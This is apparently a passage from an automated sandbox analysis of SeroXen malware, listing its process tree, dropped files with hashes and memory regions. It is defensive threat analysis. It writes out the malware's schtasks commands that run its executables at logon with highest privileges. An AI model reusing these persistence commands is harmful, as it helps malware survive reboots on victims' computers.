                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:2004
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1372
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2176
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2336
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2380
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2636
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2644
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2668
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2704
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2736
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2788
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2820
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2828
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2848
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3112
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3180
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2076
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4136
                                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3824
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2564
                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1316
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /delete /tn "SeroXen" /f
                                                                                          4⤵
                                                                                            PID:1640
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:5096
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J3Yt7TvgBUXL.bat" "
                                                                                              4⤵
                                                                                                PID:3520
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2156
                                                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                                                    chcp 65001
                                                                                                    5⤵
                                                                                                      PID:3540
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping -n 10 localhost
                                                                                                      5⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:4884
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2904
                                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                    "SCHTASKS.exe" /create /tn "$77Client.exe" /tr "'C:\Users\Admin\AppData\Roaming\SubDir\Client.exe'" /sc onlogon /rl HIGHEST
                                                                                                    4⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:2712
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                        PID:3416
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1908
                                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                    "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:276
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                1⤵
                                                                                                  PID:3444
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                  1⤵
                                                                                                    PID:3464
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3844
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                      PID:3908
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                      1⤵
                                                                                                        PID:4000
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4016
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:4352
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                          1⤵
                                                                                                            PID:4428
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                            1⤵
                                                                                                              PID:3684
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                              1⤵
                                                                                                                PID:796
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                1⤵
                                                                                                                  PID:2000
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4908
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2044
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:2016
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:2068
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:4052
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1200
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4896
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                          1⤵
                                                                                                                            PID:2988
                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                                            1⤵
                                                                                                                              PID:4612
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4612 -s 952
                                                                                                                                2⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:2164
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                              • Modifies registry class
                                                                                                                              PID:1524
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              PID:1752
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 408 -p 4612 -ip 4612
                                                                                                                                2⤵
                                                                                                                                  PID:2692
                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                1⤵
                                                                                                                                  PID:1596
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                  1⤵
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:1200
                                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                  1⤵
                                                                                                                                    PID:2524
                                                                                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                    1⤵
                                                                                                                                      PID:4496
                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:4368

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.06da4553-2c70-4a0b-9ec3-f3cd88d73017.tmp.csv

                                                                                                                                        Filesize

                                                                                                                                        34KB

                                                                                                                                        MD5

                                                                                                                                        41cb64b16614380f9f6f5cd7c4fb9b09

                                                                                                                                        SHA1

                                                                                                                                        3fe65fccae7e14f2b707706566bcc4291dc07697

                                                                                                                                        SHA256

                                                                                                                                        fbeca5bd2f540158279bb80fe2eb3f21c8f2f96506351ef751ba78a7cf36f26c

                                                                                                                                        SHA512

                                                                                                                                        fa38c502f4de4da29f2bc6cc7aeccc708bc114079d297bb9ab472e1beda646b93d266de38933b667a080f79aa6eb9beafa4741c6f54f52b9093095f8c26871e1

                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.469cb536-a9e0-40e0-9a6d-16e38c2d793d.tmp.txt

                                                                                                                                        Filesize

                                                                                                                                        13KB

                                                                                                                                        MD5

                                                                                                                                        942061379f6274abf87eb7a6ee829023

                                                                                                                                        SHA1

                                                                                                                                        70f6282667762c2537ba3120615ce2661d6574bf

                                                                                                                                        SHA256

                                                                                                                                        c83ed7d87da594394a4883b87f3949cc3d79b642f50bea4fe767fea070d5b238

                                                                                                                                        SHA512

                                                                                                                                        56eecb33c6aa8442b483fd8b0723127ec0686c096f2e6d44ace92739ab96955228449bd896275cf1189d11a149b613b62c49e692c142934164257b6c38fa4c0d

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                                                                                                                                        Filesize

                                                                                                                                        404B

                                                                                                                                        MD5

                                                                                                                                        5daae52d827657a6026197d4c22d33d1

                                                                                                                                        SHA1

                                                                                                                                        79e3a41d4a55bdcfd790c6d131b06ffb8e7c4ae8

                                                                                                                                        SHA256

                                                                                                                                        806766fd9a45085d69e56b3c72649a97c1010d51a530e9df7adea5ffecbf4705

                                                                                                                                        SHA512

                                                                                                                                        3df699616061f7b257c84cacdacaf24269ed72faf032bd4d29ca4ae9c1fc559713744029c7f1946d2bd41ffc0171b575536a0bb62b42162f89b84fe347eca9cc

                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                        Filesize

                                                                                                                                        302B

                                                                                                                                        MD5

                                                                                                                                        d727f70eb408d069191c747cb1effbd2

                                                                                                                                        SHA1

                                                                                                                                        84aa64c65ebfd1102f4a704bebd9daf471f0e310

                                                                                                                                        SHA256

                                                                                                                                        d21191a08ebdefad608ffbe3c00bb1975f17966345820d9295ef7636229a591a

                                                                                                                                        SHA512

                                                                                                                                        5f38298423aabcf1625cb0e144e86b2b9c8767c26d6314bb28baaadd44a446adb657572bee4e64446669e065a89b955994da0914a8b76a35747d693d06aa3ac8

                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                        Filesize

                                                                                                                                        290B

                                                                                                                                        MD5

                                                                                                                                        2a229e27a808e3e2d222579fa122c8b9

                                                                                                                                        SHA1

                                                                                                                                        efaba579fd3a2a6842056e46f6457b38c1e09831

                                                                                                                                        SHA256

                                                                                                                                        01855d4c2a2d51909722f4b34e1613ad43996bc8670251c6f9942f866d234496

                                                                                                                                        SHA512

                                                                                                                                        e56fbcc72fc17c954d48d1235f685a098afba19bf1dd70cbb016416976217d3cd5d1604a6c736cd024337c9510ada694e62ffbf2c15a367ebd20d400b6f6120e

                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                        Filesize

                                                                                                                                        290B

                                                                                                                                        MD5

                                                                                                                                        b791f5255f05ed0596c9925671059e6c

                                                                                                                                        SHA1

                                                                                                                                        0a13bfc7410126068a66cba57448f70a32f21d22

                                                                                                                                        SHA256

                                                                                                                                        d1a9cc95c148c31ebc47920eb1a51fc25d3fafcbcd126fcf33363f50dea56a47

                                                                                                                                        SHA512

                                                                                                                                        8e4962cae0a6fbe2d06b285267cf49bf1af6c43fc9a4dc5e3d28e9d3b02559352f67c7f6f15d32a50d58561a14b64fd77f01d57b01e5d4baffb6ad686a275f56

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\J3Yt7TvgBUXL.bat

                                                                                                                                        Filesize

                                                                                                                                        262B

                                                                                                                                        MD5

                                                                                                                                        ec4adb11215822d3dd4764f9d49c3b6f

                                                                                                                                        SHA1

                                                                                                                                        35b2769e6a45a3dbb5931b63494f1e2ecb8399da

                                                                                                                                        SHA256

                                                                                                                                        b731df76d6e508eba883bcf459e34de5a912fd4b8d836e63d01fd002e8df6eab

                                                                                                                                        SHA512

                                                                                                                                        eb66ab492a56043ccac3806830832d34ec9f546518bcc635aab07f7d0876249fcbaf63c80fbaf4280bb790c0444ba35559d51093629b74c3498dcacd07cd5fcf

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                                        Filesize

                                                                                                                                        162KB

                                                                                                                                        MD5

                                                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                        SHA1

                                                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                        SHA256

                                                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                        SHA512

                                                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Logs\05-11-~1

                                                                                                                                        Filesize

                                                                                                                                        224B

                                                                                                                                        MD5

                                                                                                                                        e44efba5e7dbc5255f826df13975f370

                                                                                                                                        SHA1

                                                                                                                                        e4fbc90155ed3115c6a2155200043186e3449fd4

                                                                                                                                        SHA256

                                                                                                                                        546e71dcea64385d1c16bfcabfece3e02cbe5af84eb3f1d6b98a8e2b186076a4

                                                                                                                                        SHA512

                                                                                                                                        94b8aa524fd7a1e34938b445c59e6c06d7eab3a1e7906f32c24db0466ee6e199490886c94596f2724f25f10137e26591ace8aa2a9bba7cebc04493e3e93c224f

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

                                                                                                                                        Filesize

                                                                                                                                        409KB

                                                                                                                                        MD5

                                                                                                                                        4c2bb0618a6eda615c8001d5a7ccd6c0

                                                                                                                                        SHA1

                                                                                                                                        c88d2c8bfc5906a5cfef78893d1132edcffd71f0

                                                                                                                                        SHA256

                                                                                                                                        abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

                                                                                                                                        SHA512

                                                                                                                                        6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

                                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_4a40zs0m.k0m.ps1

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                        SHA1

                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                        SHA256

                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                        SHA512

                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                        Filesize

                                                                                                                                        338B

                                                                                                                                        MD5

                                                                                                                                        27b51408c2d36f670763eaa4c5d16f11

                                                                                                                                        SHA1

                                                                                                                                        fc9e8bdbed9f158bde3d68c5323a7368b1fe328a

                                                                                                                                        SHA256

                                                                                                                                        5e3984e77e2a8b30e73ad66832a23a52c13ce217679f5d64275ab1b572db3544

                                                                                                                                        SHA512

                                                                                                                                        55a3913402ce7518b1868640bcbdcd6fba31ca5911beff73a80e62ee761c1a63d6faef03f2c73a8c4f95961c6bdfb799f4969a5146d0e9565aab79cc7ea36fc0

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

                                                                                                                                        Filesize

                                                                                                                                        412B

                                                                                                                                        MD5

                                                                                                                                        8a2a89296e20e8971e0ad73fb46b3e69

                                                                                                                                        SHA1

                                                                                                                                        0ffadbc4b84fcebc41c494ea7903e0b2b80ae636

                                                                                                                                        SHA256

                                                                                                                                        59c4f362b0e8125080229a8d13cc70b89bd49aced195264a7904f435e736a842

                                                                                                                                        SHA512

                                                                                                                                        be06a570df1dffb515dc98323f1c0c1c82df8c7a14cdc364ffaab219f84272160b0d79a26b67e00d4821a28b42a1c2e39e7d54b7ffa01eec78962eb1cda03d31

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        5f4c933102a824f41e258078e34165a7

                                                                                                                                        SHA1

                                                                                                                                        d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

                                                                                                                                        SHA256

                                                                                                                                        d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

                                                                                                                                        SHA512

                                                                                                                                        a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

                                                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        bb7d9cd87343b2c81c21c7b27e6ab694

                                                                                                                                        SHA1

                                                                                                                                        27475110d09f1fc948f1d5ecf3e41aba752401fd

                                                                                                                                        SHA256

                                                                                                                                        b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df

                                                                                                                                        SHA512

                                                                                                                                        bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b

                                                                                                                                      • memory/480-92-0x000001DEA3760000-0x000001DEA378B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/480-98-0x000001DEA3760000-0x000001DEA378B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/480-99-0x00007FFA49470000-0x00007FFA49480000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/560-103-0x0000014FE2BC0000-0x0000014FE2BEB000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/636-58-0x00000179660F0000-0x000001796611B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/636-57-0x00000179660C0000-0x00000179660E5000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        148KB

                                                                                                                                      • memory/636-59-0x00000179660F0000-0x000001796611B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/636-65-0x00000179660F0000-0x000001796611B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/636-66-0x00007FFA49470000-0x00007FFA49480000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/696-76-0x000002647BBD0000-0x000002647BBFB000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/696-77-0x00007FFA49470000-0x00007FFA49480000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/696-70-0x000002647BBD0000-0x000002647BBFB000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/988-87-0x0000029135940000-0x000002913596B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/988-88-0x00007FFA49470000-0x00007FFA49480000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/988-81-0x0000029135940000-0x000002913596B000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        172KB

                                                                                                                                      • memory/2076-0-0x000000007493E000-0x000000007493F000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2076-2-0x0000000005530000-0x0000000005AD6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.6MB

                                                                                                                                      • memory/2076-3-0x0000000005020000-0x00000000050B2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        584KB

                                                                                                                                      • memory/2076-4-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/2076-5-0x0000000004F80000-0x0000000004FE6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        408KB

                                                                                                                                      • memory/2076-20-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/2076-1-0x00000000003F0000-0x000000000045C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        432KB

                                                                                                                                      • memory/2076-6-0x0000000005480000-0x0000000005492000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        72KB

                                                                                                                                      • memory/2076-7-0x0000000006190000-0x00000000061CC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        240KB

                                                                                                                                      • memory/3200-45-0x00007FFA87920000-0x00007FFA879DD000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        756KB

                                                                                                                                      • memory/3200-29-0x0000019DBE140000-0x0000019DBE162000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/3200-43-0x0000019DBE4F0000-0x0000019DBE51A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/3200-44-0x00007FFA893E0000-0x00007FFA895E9000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/3824-13-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/3824-1311-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/3824-1450-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/3824-14-0x0000000074930000-0x00000000750E1000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/3824-34-0x0000000006CE0000-0x0000000006CEA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/3860-54-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3860-49-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3860-47-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3860-48-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3860-51-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

